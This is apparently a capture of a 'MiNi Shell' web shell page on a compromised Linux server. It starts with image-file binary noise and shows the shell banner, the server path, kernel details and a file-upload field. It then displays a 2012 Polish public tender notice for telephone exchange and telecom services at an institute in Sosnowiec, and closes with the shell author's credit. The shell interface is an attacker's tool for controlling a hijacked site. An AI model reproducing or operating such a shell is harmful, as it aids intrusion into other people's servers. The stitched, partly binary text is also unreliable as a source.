JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121212/505800-N-2012.html

<p class="kh_header"><b>Sosnowiec: Świadczenie usług telekomunikacyjnych wraz z dzierżawą centrali telefonicznej i serwisem istniejącej sieci telefonicznej dla Instytutu Medycyny Pracy i Zdrowia Środowiskowego w Sosnowcu</b><br>
<b>Numer ogłoszenia: 505800 - 2012; data zamieszczenia: 12.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Medycyny Pracy i Zdrowia Środowiskowego , ul. Kościelna 13, 41-200 Sosnowiec, woj. śląskie, tel. 032 2660885, faks 032 2661124.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytut Badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług telekomunikacyjnych wraz z dzierżawą centrali telefonicznej i serwisem istniejącej sieci telefonicznej dla Instytutu Medycyny Pracy i Zdrowia Środowiskowego w Sosnowcu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Załącznik nr 1 - OPIS PRZEDMIOTU ZAMÓWIENIA 

  
PRZEDMIOT PRZETARGU:

Świadczenie usług telekomunikacyjnych wraz z dzierżawą centrali telefonicznej i serwisem istniejącej sieci telefonicznej dla Instytutu Medycyny Pracy i Zdrowia Środowiskowego w Sosnowcu. 

Przedmiotem zamówienia jest:
I ETAP:  dostawa, montaż, uruchomienie i włączenie do ruchu w pełni sprawnej centrali telefonicznej, wewnętrznej z urządzeniami zewnętrznymi, aparatami systemowymi wraz  z włączeniem jej do sieci zewnętrznej (operatora) i wewnętrznej (I.M.P i Z) wg. CPV - 32.54.30.00-1: 

      Wykonawca przedstawi szczegółową specyfikację oferowanych urządzeń

1)	Wymagania dotyczące centrali telefonicznej:
a) praca centrali w ruchu pełnoautomatycznym,
b) pojemność centrali 176 NN numerów wewnętrznych
- porty wewnętrzne analogowe - 160 portów,
- porty wewnętrzne cyfrowe - 16 portów,
c) linie zewnętrzne 
       - cyfrowe  ISDN  PRA(30B+D) -1 linia
       - przystawki  GSM dla 2 kart SIM
d) taryfikacja rozmów wg. numerów i kodów dostępu,
e) modem zdalnego nadzoru i oprogramowania,
f)  centralna książka telefoniczna  (1000 użytkowników),
g) kody dostępu dla połączeń zewnętrznych ( minimum 500 kodów),
h) aplikacja komputerowa  CTI dla minimum 20 stanowisk,
i)  dyskryminacja połączeń zewnętrznych (minimum 6 programowalnych poziomów),
j ) poczta głosowa (minimum 2 porty jednoczesnego dostępu oraz 60 minut 
    łącznego czasu nagrania z możliwością rozbudowy),
k) możliwość blokowania połączeń wychodzących z poziomu aparatu wewnętrznego,
l)  identyfikacja numerów przychodzących na liniach wewnętrznych analogowych,
ł) wybieranie numerów po nazwie,
e) urządzenia zasilające centralę,
f) zasilanie awaryjne na okres 4h.
g) Centrala telefoniczna powinna być wyposażona w urządzenia zapewniające    kierowanie ruchu do sieci GSM przez dostarczone przez Zlecającego dwie karty SIM.




2) Wraz z centralą telefoniczną należy dostarczyć aparaty cyfrowe systemowe tego samego producenta co centrala spełniające poniższe wymagania
     -Konsola operatorska ( awizo )   1 szt. wyposażona w:
klawisze programowalne (min. 24 klawisze),
możliwość wybrania abonenta z centralnej książki telefonicznej po jego nazwie,
system głośnomówiący,
wyświetlacz ciekłokrystaliczny.

    -Aparaty cyfrowe do zestawów Sekretarsko-Dyrektorskich 4 szt. wyposażonych w:
klawisze programowalne (min. 12 klawisze),
możliwość wybrania abonenta z centralnej książki telefonicznej po jego nazwie,
system głośnomówiący,
wyświetlacz ciekłokrystaliczny.


   - Aparaty cyfrowe proste 4 szt.
klawisze programowalne (min. 5 klawiszy),
wyświetlacz.

     
- Wykonawca udzieli na dostarczony sprzęt gwarancji na okres co najmniej 36 miesięcy licząc od dnia podpisania przez strony bez zastrzeżeń protokołu odbioru przedmiotu zamówienia.
- Zamawiający zastrzega, że dostarczony przedmiot zamówienia musi posiadać wymagane aktualnie obowiązującymi przepisami prawa zezwolenia i certyfikaty dopuszczające ten przedmiot do użytkowania na terenie Polski zgodnie z przeznaczeniem, któremu ma służyć.
- Wykonawca zobowiązany jest do dostarczenia przedmiotu zamówienia we własnym zakresie, na  własny koszt i ryzyko, bezpośrednio do budynków Zamawiającego.

II ETAP: Świadczenie usług telefonicznych z telefonów stacjonarnych końcowych i centrali wewnętrznej, wg. CPV - 64.21.10.00-8.

Świadczenie usług telekomunikacyjnych obejmuje:
I część zamówienia usługi telekomunikacyjne:
- obsługę połączeń: lokalnych, strefowych, międzystrefowych i pozostałych 
- dzierżawę centrali telefonicznej przez cały okres obowiązywania umowy tj. 36 miesięcy,
- dzierżawę aparatów telefonicznych cyfrowych systemowych,
- serwis wewnętrznej sieci telefonicznej.
II cześć zamówienia usługi internetowe:
- świadczenie usług internetowych na cele edukacyjne,
- łącze niesymetryczne,
- świadczenie usług dostępu do Internetu na łączach o przepustowości minimum 1Mbit/s.

Warunki świadczenia usług telekomunikacyjnych:
1. W ramach serwisu centrali telefonicznej i aparatów systemowych Wykonawca zobowiązuje się do:
a)utrzymania w pełnej sprawności technicznej centrali telefonicznej i aparatów systemowych,
b)przeprogramowania centrali telefonicznej i aparatów systemowych zgodnie z zgłoszonymi przez klienta  potrzebami.
2.W ramach serwisu istniejącej wewnętrznej sieci telefonicznej Wykonawca zobowiązuje się do:
a)lokalizacji i usunięcia usterek w sieci telefonicznej od centrali telefonicznej poprzez 
  przełącznice pośrednie do punktu zakończenia sieci to jest gniazdka telefonicznego,
b) wykreowania i podłączenia nowych numerów wewnętrznych w przypadku istniejącego okablowania od przełącznicy głównej do punktu zakończenia, 
c) wykonywania przeniesień urządzeń końcowych,
d) przeszkolenia użytkowników aparatów telefonicznych cyfrowych systemowych
   w zakresie ich obsługi

3. W przypadku zaistnienia konieczności zmiany operatora i przeniesienia numeracji do nowego operatora wykonawca gwarantuje bezpłatne przeniesienie oraz uruchomienie w swojej sieci w pierwszym dniu po zakończeniu okresu obowiązywania umów u dotychczasowego operatora /od godz. 24.00/.

4. Ponadto Wykonawca zobowiązuje się do:
a)świadczenia usług telekomunikacyjnych za pomocą 
-linii ISDN PRA (30B+D) z usługą DDI dla 200 numerów, - 1 linia
- linii analogowych końcowych - 3 linie
b)zachowania istniejącej zewnętrznej numeracji telefonicznej (wykaz załącznik 1),
c)zapewnienia możliwości wykonywania połączeń telefonicznych, faksowych i modemowych,  
d)zachowania ciągłości świadczenia usług telekomunikacyjnych w całym okresie trwania umowy,
e)naliczania opłat z dokładnością co do sekundy - taryfikacja sekundowa,
f)połączenia z siecią telefonii komórkowych z zachowaniem identyfikacji numeru,
g)wymaganej gwarancji jakości połączeń, wykonawca ma obowiązek sprawdzić, czy posiada warunki techniczne do realizacji przedmiotu zamówienia (potwierdzić warunki techniczne),
h)identyfikacji numerów przychodzących (CLIP) na wszystkich numerach wewnętrznych,
i)bezpłatnego połączenia w ramach sieci wewnętrznej,
j)bezpłatnego połączenia do służb powołanych ustawowo do niesienia pomocy posiadających skrócone numery
k)blokady połączeń 0700....... - 0709............ oraz innych numerów zaliczanych do taryf specjalnych,
l)miesięcznego bezpłatnego wykazu zrealizowanych połączeń (zbiorczego i szczegółowego) w postaci elektronicznej z możliwością wydruku według numerów wewnętrznych lub według kodów dostępowych.

5. W ramach obsługi serwisowej Wykonawca zapewni Zamawiającemu: 
a) bezpłatne okresowe przeglądy stanu technicznego pracy łączy oraz sprawdzenie parametry łączy poprzez bieżące, cykliczne ich pomiary, eliminowanie usterek;
b) techniczną pomoc związaną ze świadczeniem usług telekomunikacyjnych po zgłoszeniu przez Zamawiającego obejmującą w szczególności:
- bezpłatne eliminowanie usterek i nieprawidłowości w pracy łączy, 
- bezpłatne usuwanie awarii,
- sprawdzenie instalacji wykonanej przez Zamawiającego,
- bezpłatną całodobową możliwość telefonicznej obsługi klienta.
1.W zakresie obsługi serwisowej, Wykonawca zagwarantuje usunięcie awarii w następującym trybie:
- czas reakcji do 2 godzin (czas mierzony od chwili zarejestrowania zgłoszenia otrzymanego od Zamawiającego do czasu potwierdzenia przyjęcia zgłoszenia do realizacji przez odpowiednie służby techniczne), do 48 godzin czas usunięcia usterki (przywrócenie pełnej funkcjonalności),
- w przypadku awarii 20% linii wewnętrznych lub zewnętrznych czas reakcji wynosi 1 godzinę a czas usunięcia usterki 24 godziny.

Warunki ogólne dla obu części zamówienia:
Rozliczenia za świadczone usługi będą następować w systemie miesięcznym. Zamawiający zobowiązany będzie do uiszczenia opłaty za zrealizowane usługi w terminie 30 dni od wystawienia faktury.
W formularzu ofertowym wykonawca wskaże, czy powyższe zamówienie wykona sam w 100%, czy też część realizacji zamówienia powierzy podwykonawcom. W przypadku realizacji zamówienia przy współudziale podwykonawców, wykonawca określi opisowo, jaką część zamówienia zamierza im powierzyć.
Zamówienie będzie realizowane na zasadach i warunkach określonych w SIWZ, w tym w załącznikach do SIWZ, a  zwłaszcza w zawartych w opisie przedmiotu zamówienia i projekcie umowy.

Zamawiający nie poniesie dodatkowych kosztów związanych z rozbudową infrastruktury, o ile zajdzie taka potrzeba w związku z realizacją przedmiotu zamówienia

Wykonawca zobowiązuje się do przedstawienia wszystkich kosztów związanych z przedmiotem zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 64.20.00.00-8, 64.21.00.00-1, 64.21.11.00-9, 64.21.12.00-0, 64.21.42.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest wnieść wadium w wysokości: 5.000 zł (pięć tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie potwierdzające wiarygodność Oferenta na podstawie art.22 ust 1, na formularzu stanowiącym załącznik nr 5 do niniejszej specyfikacji.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie potwierdzające wiarygodność Oferenta na podstawie art.22 ust 1, na formularzu stanowiącym załącznik nr 5 do niniejszej specyfikacji.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie potwierdzające wiarygodność Oferenta na podstawie art.22 ust 1, na formularzu stanowiącym załącznik nr 5 do niniejszej specyfikacji.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie potwierdzające wiarygodność Oferenta na podstawie art.22 ust 1, na formularzu stanowiącym załącznik nr 5 do niniejszej specyfikacji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie potwierdzające wiarygodność Oferenta na podstawie art.22 ust 1, na formularzu stanowiącym załącznik nr 5 do niniejszej specyfikacji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zaświadczenie o wpisie do rejestru przedsiębiorców telekomunikacyjnych prowadzonym przez Prezesa Urzędu Komunikacji Elektronicznej</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający  przewiduje możliwość zmian zapisów umowy, w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.imp.sosnowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W Sekretariacie Głównym IMPiZŚ, pok.103, ul. Kościelna 13, Sosnowiec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.01.2013 godzina 10:00, miejsce: W Sekretariacie Głównym IMPiZŚ, pok.103, ul. Kościelna 13, Sosnowiec.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com